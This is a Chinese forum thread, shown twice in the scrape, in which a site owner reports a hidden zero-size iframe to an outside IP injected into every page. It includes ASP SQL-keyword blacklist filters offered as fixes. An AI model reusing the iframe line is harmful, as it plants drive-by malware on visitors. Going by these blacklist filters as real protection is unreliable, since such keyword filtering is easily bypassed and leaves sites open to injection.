网站被入侵修改,大家看小弟我看看
日期:2014-05-17 浏览次数:21392 次
网站被入侵修改,大家看我看看!
网站(www.68bj.cn)最近一些时间老被入侵,每个页面加有代码: <iframe src=http://125.91.14.111 width=0 height=0> </iframe> ,可能是SQL注入,或别的原因,我对程序不太精通,听说有一些代码防SQL注入攻击:但我加在CONN.ASP会提示出错,是不是还需要修改才可以,哪位帮个忙,我们这个网站应该加什么样的代码?
网上防注入代码:
dim sql_injdata
SQL_injdata = " '|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare "
SQL_inj = split(SQL_Injdata, "| ")
If Request.QueryString <> " " Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))> 0 Then
Response.Write " <Script Language=****> alert( '天下电影联盟SQL通用防注入系统提示↓nn请不要在参数中包含非法字符尝试注入! ');history.back(-1) </Script> "
Response.end
end if
next
Next
End If
If Request.Form <> " " Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))> 0 Then
Response.Write " <Script Language=****> alert( '天下电影联盟SQL通用防注入系统提示↓nn请不要在参数中包含非法字符尝试注入!nnHTTP: //www.521movie.com ');history.back(-1) </Script> "
Response.end
end if
next
next
end if
------解决方案--------------------
'屏蔽通过表单攻击
for each item in request.form
stritem=lcase(server.HTMLEncode(Request.form(item)))
if instr(stritem, "select ")> =1 or instr(stritem, "insert ")> =1 or instr(stritem, "update ")> =1 or instr(stritem, "delete ")> =1 or instr(stritem, "exec ")> =1 or instr(stritem, "declare ")> =1 then
response.write ( "对不起,请不要输入非法字符! ")
response.end
end if
next
试下这个 我一直用的
------解决方案--------------------
没有漏洞 是你的iis 也就是说你的服务器上有病毒 我以前也遇到过
网站(www.68bj.cn)最近一些时间老被入侵,每个页面加有代码: <iframe src=http://125.91.14.111 width=0 height=0> </iframe> ,可能是SQL注入,或别的原因,我对程序不太精通,听说有一些代码防SQL注入攻击:但我加在CONN.ASP会提示出错,是不是还需要修改才可以,哪位帮个忙,我们这个网站应该加什么样的代码?
网上防注入代码:
dim sql_injdata
SQL_injdata = " '|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare "
SQL_inj = split(SQL_Injdata, "| ")
If Request.QueryString <> " " Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))> 0 Then
Response.Write " <Script Language=****> alert( '天下电影联盟SQL通用防注入系统提示↓nn请不要在参数中包含非法字符尝试注入! ');history.back(-1) </Script> "
Response.end
end if
next
Next
End If
If Request.Form <> " " Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))> 0 Then
Response.Write " <Script Language=****> alert( '天下电影联盟SQL通用防注入系统提示↓nn请不要在参数中包含非法字符尝试注入!nnHTTP: //www.521movie.com ');history.back(-1) </Script> "
Response.end
end if
next
next
end if
------解决方案--------------------
'屏蔽通过表单攻击
for each item in request.form
stritem=lcase(server.HTMLEncode(Request.form(item)))
if instr(stritem, "select ")> =1 or instr(stritem, "insert ")> =1 or instr(stritem, "update ")> =1 or instr(stritem, "delete ")> =1 or instr(stritem, "exec ")> =1 or instr(stritem, "declare ")> =1 then
response.write ( "对不起,请不要输入非法字符! ")
response.end
end if
next
试下这个 我一直用的
------解决方案--------------------
没有漏洞 是你的iis 也就是说你的服务器上有病毒 我以前也遇到过
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
